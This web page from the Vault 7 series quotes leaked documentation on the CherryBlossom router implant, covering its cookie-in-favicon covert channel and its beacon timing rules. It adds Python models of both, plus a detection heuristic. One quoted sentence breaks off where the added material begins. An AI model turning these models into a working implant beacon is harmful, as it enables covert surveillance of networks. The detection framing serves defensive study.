Vault 7: Projects

This publication series is about specific projects related to the Vault 7 main publication.

SECRET//20350112
(S) To achieve Covert Communication, the Flytrap sends the communication data (after
encryption) as the cookie of an HTTP GET request for an image file (.ico) on port 80
(unless the PoP has been specified with a different port). The CT (CherryTree) responds to
the GET request with a binary image file in an HTTP Response. On the wire the exchange
therefore looks like an ordinary favicon fetch from a client behind the router; the
payload lives only in the cookie value, so that is where any detection has to look.
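The shape of that exchange, modelled as an added example written for this page (it is not CherryBlossom code and does not reproduce its wire format). The Flytrap side wraps already-encrypted bytes in a cookie on a GET for an .ico, the CherryTree side recovers them and answers with a binary image, and a small heuristic shows what a network monitor can key on. The cookie name `sid`, the path `/favicon.ico`, the base64 cookie encoding and the stand-in ciphertext are all assumptions; the page says only "cookie" and ".ico", and does not describe how tasking is carried in the returned image.

```python
"""Model of the covert channel described above: encrypted data in the Cookie of
an HTTP GET for an .ico, answered with a binary image.  Added example for this
page, not CherryBlossom code; cookie name, path and encoding are assumptions."""
import base64
import math
import struct
from collections import Counter
from typing import Optional

COOKIE_NAME = "sid"         # assumed; the real cookie name is not on the page
ICO_PATH = "/favicon.ico"   # assumed; the page says only "an image file (.ico)"


def build_beacon_request(host: str, ciphertext: bytes, port: int = 80) -> bytes:
    """Flytrap side: wrap the ciphertext in a cookie on an otherwise ordinary GET."""
    token = base64.b64encode(ciphertext).decode()
    host_hdr = host if port == 80 else f"{host}:{port}"   # non-default PoP port
    lines = [
        f"GET {ICO_PATH} HTTP/1.1",
        f"Host: {host_hdr}",
        "User-Agent: Mozilla/5.0",
        f"Cookie: {COOKIE_NAME}={token}",
        "Connection: close",
        "",
        "",
    ]
    return "\r\n".join(lines).encode()


def parse_request(raw: bytes) -> dict:
    """Minimal HTTP/1.1 request-line and header parser (no body handling)."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode()
    request_line, *header_lines = head.split("\r\n")
    method, path, _version = request_line.split(" ", 2)
    headers = {}
    for line in header_lines:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def extract_payload(req: dict) -> Optional[bytes]:
    """CherryTree side: recover the ciphertext from the beacon cookie, if present."""
    for part in req["headers"].get("cookie", "").split(";"):
        name, _, value = part.strip().partition("=")
        if name == COOKIE_NAME and value:
            return base64.b64decode(value)
    return None


def minimal_ico() -> bytes:
    """A valid 1x1 32-bpp .ico (ICONDIR + ICONDIRENTRY + BITMAPINFOHEADER + one
    BGRA pixel + AND mask) used as the decoy image.  It carries no tasking; how
    the real image does is not described on this page."""
    bmp_header = struct.pack("<IiiHHIIiiII", 40, 1, 2, 1, 32, 0, 8, 0, 0, 0, 0)
    image = bmp_header + b"\x00\x00\x00\xff" + b"\x00\x00\x00\x00"
    icondir = struct.pack("<HHH", 0, 1, 1)
    entry = struct.pack("<BBBBHHII", 1, 1, 0, 0, 1, 32, len(image), 22)
    return icondir + entry + image


def build_ico_response(image: bytes) -> bytes:
    """CherryTree side: a plain 200 whose body is the image, as the page describes."""
    head = (f"HTTP/1.1 200 OK\r\nContent-Type: image/x-icon\r\n"
            f"Content-Length: {len(image)}\r\nConnection: close\r\n\r\n")
    return head.encode() + image


def shannon_entropy(s: str) -> float:
    """Bits per character of the string's empirical symbol distribution."""
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in Counter(s).values()) if n else 0.0


def flag_ico_beacon(req: dict, min_cookie_len: int = 40,
                    min_entropy: float = 4.0) -> bool:
    """Crude detection heuristic: a GET for an .ico carrying a long, high-entropy
    cookie value.  Browsers send session cookies with favicon fetches too, so the
    thresholds have to be tuned against a baseline of the monitored network."""
    if req["method"] != "GET" or not req["path"].lower().endswith(".ico"):
        return False
    cookie = req["headers"].get("cookie", "")
    values = [p.partition("=")[2].strip() for p in cookie.split(";") if p.strip()]
    return any(len(v) >= min_cookie_len and shannon_entropy(v) >= min_entropy
               for v in values)


if __name__ == "__main__":
    ciphertext = bytes(range(48))     # constructed stand-in for the encrypted data
    raw = build_beacon_request("203.0.113.10", ciphertext)
    req = parse_request(raw)
    print(raw.decode())
    print("recovered:", extract_payload(req) == ciphertext)
    print("flagged:", flag_ico_beacon(req))
    print("response bytes:", len(build_ico_response(minimal_ico())))
```

The heuristic is deliberately weak: a session cookie on a favicon request is normal browser behaviour, so in practice the useful signal is a router (not a client) originating periodic .ico fetches with a cookie that changes every time and a response that is always the same small image.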
15.2 (U) Beacon Logic
(S) This section documents the logic used when sending Beacons. Flytraps will
periodically make “Beacon attempts” to retrieve Mission tasking. If, as a result of a
Beacon attempt, the Flytrap retrieves a Mission, then the Beacon attempt is considered
successful.
Three types of Beacon are distinguished:
1. Initial Beacon – the very first Beacon sent after a device has been converted to a
Flytrap, or after a device has undergone a hard-reset (i.e., its NVRAM has been
reset to an initial state). Note that some newer firmwares preserve Flytrap
NVRAM parameters even after a hard-reset; in this case, one and only one
successful Initial Beacon event will ever occur on this Flytrap.
2. Periodic Beacon – Beacons sent periodically between device power-cycles.
3. Power-Cycle Beacon – if a Flytrap has successfully sent its Initial Beacon and is
then power-cycled, the first Beacon attempt after the power-cycle event is the
Power-Cycle Beacon.
Relevant definitions:
Initial Beacon Interval – the amount of time a Flytrap must be powered-on before an
Initial Beacon attempt is made.
Periodic Beacon Interval – after a successful Beacon attempt (i.e., a Mission is
received), the amount of time to wait before sending the next Periodic Beacon.
Initial/Periodic Beacon Traffic Requirement – the traffic condition that must be met
before the Initial/Periodic Beacon is sent. The traffic requirement test has two stages:
a "packets per second" test and an internet connectivity test. The following Traffic
Requirements are defined:
  Traffic Requirement   Packets per Second   Internet Connectivity Test
  NONE                    0                  No
  LOW                    10                  Yes
  MEDIUM                 50                  Yes
  HIGH                  100                  Yes
For example, if the Initial/Periodic Beacon Traffic Requirement were MEDIUM, a
Beacon would not be sent unless at least 50 packets of network traffic per second
were passing through the Flytrap and the Flytrap had internet connectivity. The
internet connectivity test involves a few different active techniques (note that the
CB team has advised the use of a passive approach), including NTP requests to
different NTP servers and a DNS lookup of the manufacturer's home page. Those active
probes are themselves traffic a network monitor can see originating from the router,
which is the cost of an active check that a passive approach avoids. The
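The Beacon logic of section 15.2 (the three Beacon types, the two intervals and the Traffic Requirement table) as an executable model, added for this page as an example; it is not CherryBlossom code. The packet rate through the device and the outcome of the connectivity test are supplied by the caller rather than measured. Two points the page leaves open are filled by assumption and marked in the code: the Power-Cycle Beacon is gated by the Periodic Beacon Traffic Requirement, and an unsuccessful attempt is simply retried on the next tick. The interval values in `scripted_run` are constructed for the walkthrough.

```python
"""Model of the Beacon decision logic in section 15.2.  Added example for this
page, not CherryBlossom code.  Assumptions (marked below): the Power-Cycle Beacon
uses the Periodic Beacon Traffic Requirement, and a failed attempt is retried on
the next tick."""
from dataclasses import dataclass, field
from enum import Enum
from typing import List, Optional, Tuple


class TrafficRequirement(Enum):
    """The page's table: minimum packets/s, and whether the internet
    connectivity test must also pass."""
    NONE = (0, False)
    LOW = (10, True)
    MEDIUM = (50, True)
    HIGH = (100, True)

    def __init__(self, pps: int, needs_internet: bool):
        self.pps = pps
        self.needs_internet = needs_internet


class BeaconType(Enum):
    INITIAL = "Initial"
    PERIODIC = "Periodic"
    POWER_CYCLE = "Power-Cycle"


@dataclass
class LinkState:
    packets_per_second: float   # traffic passing through the Flytrap
    internet_reachable: bool    # outcome of the NTP/DNS connectivity test


def traffic_requirement_met(req: TrafficRequirement, link: LinkState) -> bool:
    """Stage 1: packets-per-second test.  Stage 2: internet connectivity test."""
    if link.packets_per_second < req.pps:
        return False
    return link.internet_reachable or not req.needs_internet


@dataclass
class Flytrap:
    initial_interval: float     # seconds powered on before an Initial Beacon
    periodic_interval: float    # seconds after a success before the next Periodic
    initial_req: TrafficRequirement
    periodic_req: TrafficRequirement
    nvram_preserved_on_hard_reset: bool = False
    initial_done: bool = False          # persistent (NVRAM)
    uptime: float = 0.0                 # volatile state from here on
    since_success: float = 0.0
    attempted_since_boot: bool = False
    log: List[Tuple[BeaconType, bool]] = field(default_factory=list)

    def power_cycle(self) -> None:
        self.uptime = self.since_success = 0.0
        self.attempted_since_boot = False

    def hard_reset(self) -> None:
        """NVRAM back to initial state unless the firmware preserves it."""
        self.power_cycle()
        if not self.nvram_preserved_on_hard_reset:
            self.initial_done = False

    def tick(self, dt: float, link: LinkState,
             mission_available: bool) -> Optional[Tuple[BeaconType, bool]]:
        """Advance the clock by dt seconds.  Returns (beacon type, success) when
        an attempt is made; success means a Mission was retrieved."""
        self.uptime += dt
        self.since_success += dt
        if not self.initial_done:
            if self.uptime < self.initial_interval:
                return None
            kind, req = BeaconType.INITIAL, self.initial_req
        elif not self.attempted_since_boot:
            kind, req = BeaconType.POWER_CYCLE, self.periodic_req  # assumption
        elif self.since_success < self.periodic_interval:
            return None
        else:
            kind, req = BeaconType.PERIODIC, self.periodic_req
        if not traffic_requirement_met(req, link):
            return None   # hold the Beacon until there is cover traffic
        self.attempted_since_boot = True
        success = mission_available
        self.log.append((kind, success))
        if success:
            self.since_success = 0.0
            if kind is BeaconType.INITIAL:
                self.initial_done = True
        return kind, success


def scripted_run() -> List[Tuple[BeaconType, bool]]:
    """Walk one Flytrap through all three Beacon types (constructed scenario)."""
    quiet, busy = LinkState(5, True), LinkState(80, True)
    ft = Flytrap(60, 300, TrafficRequirement.MEDIUM, TrafficRequirement.LOW)
    ft.tick(30, busy, True)    # too early for the Initial Beacon
    ft.tick(30, quiet, True)   # 60 s up, but 5 pps fails MEDIUM (50 pps)
    ft.tick(10, busy, False)   # Initial attempt, no Mission: not successful
    ft.tick(10, busy, True)    # Initial Beacon succeeds
    ft.tick(100, busy, True)   # still inside the Periodic Beacon Interval
    ft.tick(200, busy, True)   # Periodic Beacon
    ft.power_cycle()
    ft.tick(1, busy, True)     # Power-Cycle Beacon
    ft.hard_reset()
    ft.tick(60, busy, True)    # NVRAM wiped, so an Initial Beacon again
    return ft.log
```

From a monitoring point of view the model makes the timing signature explicit: a router that only ever reaches out when there is enough client traffic to hide in, and that goes quiet on an idle network, is the behaviour the Traffic Requirement is designed to produce.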